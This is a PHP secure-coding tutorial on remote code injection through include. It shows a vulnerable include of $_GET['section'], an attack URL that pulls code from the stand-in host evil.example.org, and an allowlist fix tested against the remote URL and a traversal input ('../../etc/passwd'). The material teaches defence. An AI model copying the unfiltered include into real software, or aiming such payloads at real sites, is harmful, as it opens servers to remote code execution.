Last update:   29-10-2021

Remote code injection

A remote code injection attack occurs when an attacker is able to cause your application to execute PHP code of their choosing. Never use tainted data in an include or require.
 
// index.php

// Remote includes require allow_url_include = 1 in php.ini (default 0);
// allow_url_fopen (default 1) must also be on. Neither can be changed with ini_set().

include "{$_GET['section']}/data.inc.php";

    // http://example.org/?section=news
    // include "news/data.inc.php";
 
// Attack

    // http://example.org/?section=http%3A%2F%2Fevil.example.org%2Fattack.inc%3F
    // include "http://evil.example.org/attack.inc?/data.inc.php";

Protection

Protecting against it is straightforward: filter all input against a list of expected values and never use tainted data in an include or require.
 
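$clean = array();
$sections = array('home', 'news', 'photos', 'blog');
// Accept the value only if it exactly matches an allowlisted section name.
$section = $_GET['section'] ?? '';
if (in_array($section, $sections, true)) {
    $clean['section'] = $section;
} else {
    $clean['section'] = 'home';
}
// Only the filtered value ever reaches include.
include "{$clean['section']}/data.inc.php";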
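
The allowlist check above as a reusable function, run over constructed inputs that include the remote URL from the attack. This is an added example, not code from the original page; `SECTIONS`, `resolve_section()` and the `/var/www/app` base directory are assumptions, and the `mixed` type needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Added example. SECTIONS and resolve_section() are hypothetical names;
// the section list is the one used on this page.
const SECTIONS = ['home', 'news', 'photos', 'blog'];

/**
 * Map untrusted input to a path built only from allowlisted constants.
 * Anything unexpected (missing, array, URL, traversal) falls back to 'home'.
 */
function resolve_section(mixed $input, string $baseDir): string
{
    // ?section[]=x arrives as an array; only exact string matches are accepted.
    $section = (is_string($input) && in_array($input, SECTIONS, true))
        ? $input
        : 'home';

    // The path is assembled from the allowlisted value, never from raw input.
    return $baseDir . '/' . $section . '/data.inc.php';
}

// Constructed sample inputs, as they could arrive in $_GET['section'].
$samples = [
    'news',                                 // expected value
    null,                                   // parameter missing
    ['news'],                               // array parameter
    'http://evil.example.org/attack.inc?',  // remote include attempt
    '../../etc/passwd',                     // directory traversal
    'news/../blog',                         // allowlisted prefix plus traversal
    "news\0",                               // trailing NUL byte
];

foreach ($samples as $raw) {
    printf(
        "%-40s => %s\n",
        json_encode($raw, JSON_UNESCAPED_SLASHES),
        resolve_section($raw, '/var/www/app')  // assumed base directory
    );
}

// In index.php (assumed layout) the call would be:
// require resolve_section($_GET['section'] ?? null, __DIR__);
```

Only the first sample resolves to `news/data.inc.php`; every other input falls back to `home/data.inc.php`, so the string passed to `require` never contains attacker-supplied characters.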